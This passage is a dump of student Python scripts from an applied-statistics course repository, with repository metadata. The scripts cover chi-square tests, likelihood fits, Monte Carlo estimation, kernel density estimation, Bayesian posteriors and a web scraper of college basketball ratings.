%\n (data_0.x[0], data_0.x[1], data_0.x[2], my_chi[0]))\nplt.plot(x,y, color='r', label=fit1_label)\nplt.legend()\nplt.savefig('prob1_Column1.pdf')\n\n# plt.show()\n###############################################################################\nprint('Data 2 binom starts here')\nbinwidth = 0.1\nn_bins = np.arange(min(z2), max(z2) + binwidth, binwidth)\nobserved_values, bins, _ = plt.hist(z2, bins=n_bins, label='Data Column 3')\nasdasd = np.arange(0, 22.1, 0.1)\nexpected_values = binom.pmf(asdasd, 5000, data_3.x[0]) * len(z2)\nplt.close()\nprint(observed_values[observed_values != 0])\nprint(expected_values[expected_values != 0][:-1])\n\nmy_chi = chisquare(observed_values[observed_values != 0],\n f_exp=expected_values[expected_values != 0][1:])\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05,\n len(expected_values[expected_values != 0][1:]) - 1))" }, { "alpha_fraction": 0.561488687992096, "alphanum_fraction": 0.6051779985427856, "avg_line_length": 18.3125, "blob_id": "815a50f203fb0488bf24839ce02c1caa2722bd19", "content_id": "9f42073c5435ebd6f15b02ec533fde04a69c8d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 92, "num_lines": 32, "path": "/Week_2/Class_3/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\nmu = 0.2\nsigma = 0.1\nN = 50\n\ns = np.random.normal(mu, sigma, N)\n\nbinwidth = 0.01\n\nmu_scan = np.arange(0.05, 0.3 + binwidth, binwidth)\nsigma_scan = np.arange(0.05, 0.3 + binwidth, binwidth)\n\n\nLLH = np.zeros((len(mu_scan), len(sigma_scan)))\n\n\nfor i, mu in enumerate(mu_scan, 0):\n for j, sigma in enumerate(sigma_scan, 0):\n\n LLH[i, j] = np.sum(np.log(my_gauss(s, mu, sigma)))\n\n\nplt.imshow(LLH, cmap='hot')\nplt.show()\n" }, { "alpha_fraction": 0.5928629636764526, "alphanum_fraction": 0.6155717968940735, "avg_line_length": 25.80434799194336, "blob_id": "bd6f6ce2a6f5191b84602308eccf711709ff6e73", "content_id": "4826ec5c20523314bdf3c0c175dcc311df8f4d5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 81, "num_lines": 46, "path": "/Week_1/Class_2/mc_pi_centrallimit.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\nrandom.seed(142)\n\n# N is the number of throws per test\nN = 100\nnumber_of_tests = 10000\npi = np.empty((1, 0))\ncounter = 1\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n pi = np.append(pi, len(x) / N * 4)\n\nbinwidth = 0.1\nn_bins = np.arange(min(pi), max(pi) + binwidth, binwidth)\nplt.hist(pi, bins=n_bins, density='True')\n\nlnspc = np.linspace(min(pi), max(pi), len(pi))\n# lets try the normal distribution first\nm, s = stats.norm.fit(pi) # get mean and standard deviation\npdf_g = stats.norm.pdf(lnspc, m, s) # now get theoretical values in our interval\nplt.plot(lnspc, pdf_g, label=\"Norm\") # plot it\n\nprint(stats.chisquare(pi, f_exp=pdf_g))\n# plt.show()\n" }, { "alpha_fraction": 0.6515151262283325, "alphanum_fraction": 0.6767676472663879, "avg_line_length": 18.799999237060547, "blob_id": "12fffd253d25870449b4c02cc4d0a42bb4eaecc7", "content_id": "0e206ab302b5297277f26fed621d2f0422c2336b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 44, "num_lines": 20, "path": "/Week_1/Class_2/RNG.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# Initiate what seed i wanna use\nrandom.seed(142)\n\n# Create my empty arrays\nx = np.empty((1, 0))\ny = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(100):\n x = np.append(x, random.random())\n y = np.append(y, random.random())\n\n# Plot the numbers\nplt.plot(x, y, marker='o', linestyle='None')\nplt.show()\n" }, { "alpha_fraction": 0.5858895778656006, "alphanum_fraction": 0.6411042809486389, "avg_line_length": 19.4375, "blob_id": "d85232d08e70a52a8c4d36e827cec29e2b6f2539", "content_id": "8ee9b78574ac42fdcda197c7a78b9746625ecd2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 326, "license_type": "no_license", "max_line_length": 49, "num_lines": 16, "path": "/AMAS_ProbSet2_NJT478/Code/Problem_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfrom scipy.stats import chi2\nimport numpy as np\n\ndf = 1\nx = np.linspace(0, 10, 1000)\ny = chi2.pdf(x, df)\n\nplt.style.use('bmh')\n\nplt.plot(x, y, label='$\\chi ^ 2$ pdf where df=1')\nplt.ylabel('$PDF$ $(\\chi ^ 2$)')\nplt.xlabel('$\\chi ^ 2$')\nplt.legend()\nplt.savefig('Figure_1', dpi=200)\n# plt.show()" }, { "alpha_fraction": 0.4848708510398865, "alphanum_fraction": 0.5217711925506592, "avg_line_length": 19.223880767822266, "blob_id": "34c2fd61eec3d16ce1772f010acbbe0721232093", "content_id": "49ab68f65e5a41e9c3574c6661fd04c15d9101b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 92, "num_lines": 67, "path": "/Week_4/Class_8/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KernelDensity\n\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\ndef my_kernel(data, x, h):\n\n kernels = np.array([])\n\n for k in x:\n temp = 0\n x_diff = 0\n\n for i in data:\n x_diff = (k - i) / h\n if abs(x_diff) < 1:\n temp += 1 / (2 * h)\n else:\n pass\n\n temp = temp / len(data)\n kernels = np.append(kernels, temp)\n\n return kernels\n\n\ndef my_kernel_gauss(data, x, h):\n\n kernels = np.array([])\n mu = 0\n sigma = 3\n\n for k in x:\n temp = 0\n x_diff = 0\n\n for i in data:\n x_diff = (k - i)\n temp += my_gauss(x_diff, mu, sigma)\n\n temp = temp / len(data)\n kernels = np.append(kernels, temp)\n\n return kernels\n\n\ndata = np.array([1, 2, 5, 6, 12, 15, 16, 16, 22, 22, 22, 23])\n\nh = 1.5\n\nx = np.linspace(-10, 35, 1000)\n\np = my_kernel(data, x, h)\np2 = my_kernel_gauss(data, x, h)\nkde = KernelDensity(kernel='gaussian', bandwidth=2 * h).fit(data[:, None])\np3 = np.exp(kde.score_samples(x[:, None]))\n\nplt.plot(x, p, label='Box')\nplt.plot(x, p2, label='Gauss_homemade')\nplt.plot(x, p3, label='KDE scipy')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.5503565073013306, "alphanum_fraction": 0.5989304780960083, "avg_line_length": 25.0930233001709, "blob_id": "a3a9e7b7fbcc67a889b1f290d8c150a7556190c4", "content_id": "52ec172ac7df037663491e45cc4d57831b4c7231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2244, "license_type": "no_license", "max_line_length": 90, "num_lines": 86, "path": "/AMAS_ProbSet2_NJT478/Code/problem_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nimport random\n\nfname = 'ProblemSet2_Problem2.txt'\ndata = np.loadtxt(fname, skiprows=2)\n\nx_bottom_temp = data[0:12, 0]\ny_bottom_temp = data[0:12, 1]\n\nx_bottom_temp1 = data[37::, 0]\ny_bottom_temp1 = data[37::, 1]\n\nx_bottom = np.append(x_bottom_temp, x_bottom_temp1)\ny_bottom = np.append(y_bottom_temp, y_bottom_temp1)\n\nx_top = data[11:38, 0]\ny_top = data[11:38, 1]\n\nf_bottom = interpolate.interp1d(x_bottom, y_bottom)\nxnew = np.linspace(0.3, 1.7, 1000)\nynew = f_bottom(xnew)\n\n\nf_top = interpolate.interp1d(x_top, y_top)\nxnew_1 = np.linspace(0.3, 1.7, 1000)\nynew_1 = f_top(xnew_1)\n\n\n# N is the number of throws per test and A is area\nN = 100000\nnumber_of_tests = 1\nA = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.uniform(0.3, 1.7)\n y_random = random.uniform(0.05, 0.35)\n if y_random < f_top(x_random):\n if y_random > f_bottom(x_random):\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n A = np.append(A, len(x) / N * 4 * 5.2 ** 2)\n\n\nplt.plot(x_top, y_top, 'k.')\nplt.plot(x_bottom, y_bottom, 'k.')\nplt.plot(xnew, ynew, 'k-')\nplt.plot(xnew_1, ynew_1, 'k-')\nplt.plot(x, y, color='silver', marker='.', linestyle='None', markersize=2, label='Accept')\nplt.plot(x_missed, y_missed, color='black', linestyle='None', marker='.',\n markersize=2, label='Reject')\nplt.title('Monte Carlo Area')\nplt.legend(bbox_to_anchor=(0,1.0,1,0.2), loc=\"lower left\")\nplt.savefig('batman_logo.png', dpi=200)\n# plt.show()\n\n# Area \nA = (1.7 - 0.3) * (0.35 - 0.05)\nprint(\"Area: %.2f\" % (A))\n\n# Probality of hitting inside batman logo\np = len(x) / N\n\nprint(\"Probality hitting inside: %.2f%%\" % (p))\n\n# Area of logo\nA_logo = A * p\nprint(\"Area: %.4f\" % (A_logo))\n" }, { "alpha_fraction": 0.5099278092384338, "alphanum_fraction": 0.6281588673591614, "avg_line_length": 24.76744270324707, "blob_id": "e1da513abf89008e3798d9a1da7af0752e239dc0", "content_id": "0ea6ca0fb05f3b8db8c34f37488a371a6379f2d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 78, "num_lines": 43, "path": "/Problem_set_2/problem_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\ndef p_Ai_D(produced, defective):\n p_D = np.sum(produced * defective)\n p_Ai_D = (defective * produced / p_D) * 100\n return p_Ai_D\n\n\n# Total produced in percentage\nproduced = np.array([35, 15, 5, 20, 25]) / 100\n# Defective units in percentage\ndefective = np.array([2, 4, 10, 3.5, 3.1]) / 100\nprint(produced * defective * 100)\n\n# Bayes: Probablity that defective unit came from A_i facility\nprint(p_Ai_D(produced, defective))\n\n\n# print('Probablity device comes from A_2 give its defective %.2f' % (p_A2_D))\n\ntemp = defective * produced\ntemp_max = max(temp)\ntemp_index = np.argmax(temp)\n\nnew_defective = temp_max / produced\nprint(new_defective * 100)\n\n\n########\n\nproduced = np.array([0.27, 0.1, 0.05, 0.08, 0.25, 0.033, 0.019, 0.085,\n 0.033, 0.02, 0.015, 0.022, 0.015, 0.008])\n\ndefective = np.array([0.02, 0.04, 0.1, 0.035, 0.022, 0.092, 0.12, 0.07,\n 0.11, 0.02, 0.07, 0.06, 0.099, 0.082])\n\ntemp = defective * produced\ntemp_max = max(temp)\ntemp_index = np.argmax(temp)\n\nnew_defective = temp_max / produced\nprint(np.round(new_defective, 3) )\n" }, { "alpha_fraction": 0.5746117234230042, "alphanum_fraction": 0.6225523352622986, "avg_line_length": 29.85416603088379, "blob_id": "82d66adf6c935559445c2a8acef67cc6b96556d2", "content_id": "071f96d79e50b984a94660fa4a17b84875b78da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1481, "license_type": "no_license", "max_line_length": 101, "num_lines": 48, "path": "/Exam_2019/Code/Problem_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.stats import chisquare, chi2, binom, beta\nfrom scipy import integrate\nfrom scipy.optimize import minimize\n\nplt.style.use('bmh')\n\nfname = 'Exam_2019_Problem3a.txt'\ndata = np.loadtxt(fname)\n\nsorted_data = np.sort(data)\nindex = len(sorted_data)*(1-0.0455)\n\nprint(sorted_data[math.ceil(index)])\n\n\nbinwidth = 0.8\nn_bins = np.arange(0, max(data) + binwidth, binwidth)\nplt.hist(data, bins=n_bins, density=True)\n\nprint('Threshold value ', chi2.isf(0.0455, 5))\nplt.close()\n###############################################################################\na = 89\nb = 45\n\n\nn = 5\nk = 2\np = np.arange(0, 1.001, 0.001)\n\nnormz1 = integrate.quad(lambda p: binom.pmf(k, n, p), 0, 1)[0]\nnormz2 = integrate.quad(lambda p: beta.pdf(p, a, b), 0, 1)[0]\nnormz3 = integrate.quad(lambda p: beta.pdf(p, a, b) * binom.pmf(k, n, p), 0, 1)[0]\nestimate = integrate.quad(lambda p: p*beta.pdf(p, a, b) * binom.pmf(k, n, p) / normz3, 0, 1)[0]\nestimate2 = integrate.quad(lambda p: p**2 * beta.pdf(p, a, b) * binom.pmf(k, n, p) / normz3, 0, 1)[0]\n\nplt.plot(p, beta.pdf(p, a, b) / normz2, 'k', label='prior')\nplt.plot(p, binom.pmf(k, n, p) / normz1 , 'b', label='likelihood')\nplt.plot(p, beta.pdf(p, a, b) * binom.pmf(k, n, p) / normz3, 'r', label='posterior')\nplt.legend()\nplt.show()\n\nprint('likelihood at 0.35 ', binom.pmf(k, n, 0.35) / normz1)\nprint('uncertainty ', np.sqrt(estimate2 - estimate ** 2))\nprint('Mean of posterior: ', estimate )\n" }, { "alpha_fraction": 0.50722736120224, "alphanum_fraction": 0.5427069664001465, "avg_line_length": 23.815217971801758, "blob_id": "0466014a0478a729cae862cdfbfe58f3226df046", "content_id": "3e6c9616b34d00be127c5f403f401bbf71014998", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2283, "license_type": "no_license", "max_line_length": 79, "num_lines": 92, "path": "/Week_4/Class_7/exercise_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import chisquare\n\n\nfname = 'Lecture8_LLH_Ratio_2_data.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx_1 = loaded_file[:, 0]\n\nfname = 'Lecture8_LLH_Ratio_2a_data.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx_2 = loaded_file[:, 0]\n\n\ndef norm(x, alpha, beta):\n upper_lim = (max(x) + 1 / 2 * alpha * (max(x) ** 2) +\n 1 / 3 * beta * (max(x) ** 3))\n lower_lim = (min(x) + 1 / 2 * alpha * (min(x) ** 2) +\n 1 / 3 * beta * (min(x) ** 3))\n\n integral = upper_lim - lower_lim\n return integral\n\n\ndef norm_alternate(x, alpha, beta, gamma):\n upper_lim = (max(x) +\n 1 / 2 * alpha * (max(x) ** 2) +\n 1 / 3 * beta * (max(x) ** 3) -\n 1 / 6 * gamma * (max(x) ** 6))\n lower_lim = (min(x) +\n 1 / 2 * alpha * (min(x) ** 2) +\n 1 / 3 * beta * (min(x) ** 3) -\n 1 / 6 * gamma * (min(x) ** 6))\n\n integral = upper_lim - lower_lim\n return integral\n\n\ndef my_func(x, alpha, beta):\n return (1 + alpha * x + beta * x ** 2) / norm(x, alpha, beta)\n\n\ndef my_func_alternate(x, alpha, beta, gamma):\n return ((1 + alpha * x + beta * x ** 2 - gamma * x ** 5) /\n norm_alternate(x, alpha, beta, gamma))\n\n\nbinwidth = 0.05\nn_bins = np.arange(min(x_1), max(x_1) + binwidth, binwidth)\ny, x, _ = plt.hist(x_1, bins=n_bins, normed=1)\n\nx = x + binwidth / 2\n\npopt, pcov = curve_fit(my_func, x[0:-1], y)\n\nplt.plot(x, my_func(x, *popt), 'r--',\n label='fit: a=%5.3f, b=%5.3f' % tuple(popt))\n\nplt.plot(x[0:-1], y, linestyle='none', marker='.')\n\n\nprint(chisquare(y, my_func(x[0:-1], *popt), ddof=len(y)-2))\n\nLLH = np.sum(np.log(my_func(x_1, *popt)))\n\nprint(LLH)\n\n#####\n\npopt_alternate, pcov = curve_fit(my_func_alternate, x[0:-1], y)\n\nplt.plot(x, my_func_alternate(x, *popt_alternate), 'b--',\n label='fit: a=%5.3f, b=%5.3f, g=%5.3f' % tuple(popt_alternate))\n\nplt.plot(x[0:-1], y, linestyle='none', marker='.')\nplt.legend()\nplt.show()\n\n\nprint(chisquare(y, my_func_alternate(x[0:-1], *popt_alternate), ddof=len(y)-2))\n\nLLH1 = np.sum(np.log(my_func_alternate(x_1, *popt_alternate)))\n\nprint(LLH1)\n\nLLH_ratio = -2 * (LLH - LLH1)\nprint('Likelyhood Ratio', LLH_ratio)\n" }, { "alpha_fraction": 0.8461538553237915, "alphanum_fraction": 0.8461538553237915, "avg_line_length": 51, "blob_id": "d708f1b68d9c14d16cabe63f12cc72c820af7cd2", "content_id": "645b56797734d475e3984bb0636f1444e57eb75c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/Project/readme.md", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "#Project for advanced methods in applied statistics\n" }, { "alpha_fraction": 0.5718390941619873, "alphanum_fraction": 0.6005747318267822, "avg_line_length": 18.33333396911621, "blob_id": "ab71a1b536e1e59172b27ef029b574ac46412f24", "content_id": "afa7a75768b531875d24b903fea0f142a2318c4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 348, "license_type": "no_license", "max_line_length": 59, "num_lines": 18, "path": "/Week_5/Class_9/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nsigma = 1\n\nfor i in np.arange(0, 11, 0.05):\n mu = i\n s = np.random.normal(mu, sigma, 100)\n\n percentile = s[(s >= (i - sigma)) & (s <= (i + sigma))]\n x = np.ones(len(percentile)) * i\n\n plt.plot(x, percentile, 'r')\n\nplt.xlabel('True Value')\nplt.ylabel('Observed Values')\nplt.show()\n" }, { "alpha_fraction": 0.5231537222862244, "alphanum_fraction": 0.6239023804664612, "avg_line_length": 40.61153793334961, "blob_id": "889754d1088a96db6fc7bddc2a4b92ae6a12fa27", "content_id": "ee7ad823de63207efa432e4475a3fd2791062536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10819, "license_type": "no_license", "max_line_length": 137, "num_lines": 260, "path": "/Problem_set_1/problem_set_4.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.use('bmh')\n\n### Getting 2014 data\nmy_url = 'https://kenpom.com/index.php?y=2014'\nmy_page = requests.get(my_url)\n\nsoup = BeautifulSoup(my_page.text, 'html.parser')\n\nratings_table = soup.find(id='ratings-table')\n\nheaders = ratings_table.find(class_='thead2')\n\ntitles = headers.find_all('th')\n\nheader_titles = []\n\nfor title in titles:\n try:\n header_titles.append(title.contents[0].contents[0])\n except:\n header_titles.append(title.contents[0])\n\nprint(header_titles)\n\nbody = ratings_table.find_all('tbody')\nrows = body[0].find_all('tr')\n\nconferences = ['ACC', 'SEC', 'B10', 'BSky', 'A10', 'BE']\nACC_teams_2014 = np.array([])\nSEC_teams_2014 = np.array([])\nB10_teams_2014 = np.array([])\nBSky_teams_2014 = np.array([])\nA10_teams_2014 = np.array([])\nBE_teams_2014 = np.array([])\nrest_teams_2014 = np.array([])\n\nACC_AdjO_2014 = np.array([])\nSEC_AdjO_2014 = np.array([])\nB10_AdjO_2014 = np.array([])\nBSky_AdjO_2014 = np.array([])\nA10_AdjO_2014 = np.array([])\nBE_AdjO_2014 = np.array([])\nrest_AdjO_2014 = np.array([])\n\n\nfor row in rows:\n temp = row.find_all('td')\n if len(temp) == 0:\n pass\n else:\n if temp[2].contents[0].contents[0] in conferences:\n if str(temp[2].contents[0].contents[0]) == 'ACC':\n ACC_teams_2014 = np.append(ACC_teams_2014, temp[1].contents[0].contents[0])\n ACC_AdjO_2014 = np.append(ACC_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'SEC':\n SEC_teams_2014 = np.append(SEC_teams_2014, temp[1].contents[0].contents[0])\n SEC_AdjO_2014 = np.append(SEC_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'B10':\n B10_teams_2014 = np.append(B10_teams_2014, temp[1].contents[0].contents[0])\n B10_AdjO_2014 = np.append(B10_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BSky':\n BSky_teams_2014 = np.append(BSky_teams_2014, temp[1].contents[0].contents[0])\n BSky_AdjO_2014 = np.append(BSky_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'A10':\n A10_teams_2014 = np.append(A10_teams_2014, temp[1].contents[0].contents[0])\n A10_AdjO_2014 = np.append(A10_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BE':\n BE_teams_2014 = np.append(BE_teams_2014, temp[1].contents[0].contents[0])\n BE_AdjO_2014 = np.append(BE_AdjO_2014, float(temp[5].contents[0]))\n else:\n rest_teams_2014 = np.append(rest_teams_2014, temp[1].contents[0].contents[0])\n rest_AdjO_2014 = np.append(rest_AdjO_2014, float(temp[5].contents[0]))\n\n###### Getting 2009 data\nmy_url = 'https://kenpom.com/index.php?y=2009'\nmy_page = requests.get(my_url)\n\nsoup = BeautifulSoup(my_page.text, 'html.parser')\nratings_table = soup.find(id='ratings-table')\n\nbody = ratings_table.find_all('tbody')\nrows = body[0].find_all('tr')\n\nACC_teams_2009 = np.array([])\nSEC_teams_2009 = np.array([])\nB10_teams_2009 = np.array([])\nBSky_teams_2009 = np.array([])\nA10_teams_2009 = np.array([])\nBE_teams_2009 = np.array([])\nrest_teams_2009 = np.array([])\n\nACC_AdjO_2009 = np.array([])\nSEC_AdjO_2009 = np.array([])\nB10_AdjO_2009 = np.array([])\nBSky_AdjO_2009 = np.array([])\nA10_AdjO_2009 = np.array([])\nBE_AdjO_2009 = np.array([])\nrest_AdjO_2009 = np.array([])\n\nfor row in rows:\n temp = row.find_all('td')\n if len(temp) == 0:\n pass\n else:\n if temp[2].contents[0].contents[0] in conferences:\n if str(temp[2].contents[0].contents[0]) == 'ACC':\n ACC_teams_2009 = np.append(ACC_teams_2009, temp[1].contents[0].contents[0])\n ACC_AdjO_2009 = np.append(ACC_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'SEC':\n SEC_teams_2009 = np.append(SEC_teams_2009, temp[1].contents[0].contents[0])\n SEC_AdjO_2009 = np.append(SEC_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'B10':\n B10_teams_2009 = np.append(B10_teams_2009, temp[1].contents[0].contents[0])\n B10_AdjO_2009 = np.append(B10_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BSky':\n BSky_teams_2009 = np.append(BSky_teams_2009, temp[1].contents[0].contents[0])\n BSky_AdjO_2009 = np.append(BSky_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'A10':\n A10_teams_2009 = np.append(A10_teams_2009, temp[1].contents[0].contents[0])\n A10_AdjO_2009 = np.append(A10_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BE':\n BE_teams_2009 = np.append(BE_teams_2009, temp[1].contents[0].contents[0])\n BE_AdjO_2009 = np.append(BE_AdjO_2009, float(temp[5].contents[0]))\n else:\n rest_teams_2009 = np.append(rest_teams_2009, temp[1].contents[0].contents[0])\n rest_AdjO_2009 = np.append(rest_AdjO_2009, float(temp[5].contents[0]))\n\ndiff_ACC_teams = np.array([])\ndiff_ACC_AdjO = np.array([])\nACC_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(ACC_teams_2014, 0):\n for j, team_2009 in enumerate(ACC_teams_2009, 0):\n if team_2014 == team_2009:\n diff_ACC_teams = np.append(diff_ACC_teams, team_2014)\n ACC_Adjo_2009_value = np.append(ACC_Adjo_2009_value, ACC_AdjO_2009[j])\n diff_ACC_AdjO = np.append(diff_ACC_AdjO, ACC_AdjO_2014[i] - ACC_AdjO_2009[j])\n\ndiff_SEC_teams = np.array([])\ndiff_SEC_AdjO = np.array([])\nSEC_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(SEC_teams_2014, 0):\n for j, team_2009 in enumerate(SEC_teams_2009, 0):\n if team_2014 == team_2009:\n diff_SEC_teams = np.append(diff_SEC_teams, team_2014)\n SEC_Adjo_2009_value = np.append(SEC_Adjo_2009_value, SEC_AdjO_2009[j])\n diff_SEC_AdjO = np.append(diff_SEC_AdjO, SEC_AdjO_2014[i] - SEC_AdjO_2009[j])\n\ndiff_B10_teams = np.array([])\ndiff_B10_AdjO = np.array([])\nB10_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(B10_teams_2014, 0):\n for j, team_2009 in enumerate(B10_teams_2009, 0):\n if team_2014 == team_2009:\n diff_B10_teams = np.append(diff_B10_teams, team_2014)\n B10_Adjo_2009_value = np.append(B10_Adjo_2009_value, B10_AdjO_2009[j])\n diff_B10_AdjO = np.append(diff_B10_AdjO, B10_AdjO_2014[i] - B10_AdjO_2009[j])\n\ndiff_BSky_teams = np.array([])\ndiff_BSky_AdjO = np.array([])\nBSky_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(BSky_teams_2014, 0):\n for j, team_2009 in enumerate(BSky_teams_2009, 0):\n if team_2014 == team_2009:\n diff_BSky_teams = np.append(diff_BSky_teams, team_2014)\n BSky_Adjo_2009_value = np.append(BSky_Adjo_2009_value, BSky_AdjO_2009[j])\n diff_BSky_AdjO = np.append(diff_BSky_AdjO, BSky_AdjO_2014[i] - BSky_AdjO_2009[j])\n\ndiff_A10_teams = np.array([])\ndiff_A10_AdjO = np.array([])\nA10_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(A10_teams_2014, 0):\n for j, team_2009 in enumerate(A10_teams_2009, 0):\n if team_2014 == team_2009:\n diff_A10_teams = np.append(diff_A10_teams, team_2014)\n A10_Adjo_2009_value = np.append(A10_Adjo_2009_value, A10_AdjO_2009[j])\n diff_A10_AdjO = np.append(diff_A10_AdjO, A10_AdjO_2014[i] - A10_AdjO_2009[j])\n\ndiff_BE_teams = np.array([])\ndiff_BE_AdjO = np.array([])\nBE_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(BE_teams_2014, 0):\n for j, team_2009 in enumerate(BE_teams_2009, 0):\n if team_2014 == team_2009:\n diff_BE_teams = np.append(diff_BE_teams, team_2014)\n BE_Adjo_2009_value = np.append(BE_Adjo_2009_value, BE_AdjO_2009[j])\n diff_BE_AdjO = np.append(diff_BE_AdjO, BE_AdjO_2014[i] - BE_AdjO_2009[j])\n\ndiff_rest_teams = np.array([])\ndiff_rest_AdjO = np.array([])\nrest_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(rest_teams_2014, 0):\n for j, team_2009 in enumerate(rest_teams_2009, 0):\n if team_2014 == team_2009:\n diff_rest_teams = np.append(diff_rest_teams, team_2014)\n rest_Adjo_2009_value = np.append(rest_Adjo_2009_value, rest_AdjO_2009[j])\n diff_rest_AdjO = np.append(diff_rest_AdjO, rest_AdjO_2014[i] - rest_AdjO_2009[j])\n\nplt.plot(ACC_Adjo_2009_value, diff_ACC_AdjO, alpha=0.9, color='blue', marker='o', linestyle='none', label='ACC')\nplt.plot(SEC_Adjo_2009_value, diff_SEC_AdjO, color='maroon', marker='o', linestyle='none', label='SEC')\nplt.plot(B10_Adjo_2009_value, diff_B10_AdjO, alpha=1, color='yellow', markeredgecolor='black', marker='o', linestyle='none', label='B10')\nplt.plot(BSky_Adjo_2009_value, diff_BSky_AdjO, color='green', marker='o', linestyle='none', label='BSky')\nplt.plot(A10_Adjo_2009_value, diff_A10_AdjO, alpha=1, color='grey', markeredgecolor='black', 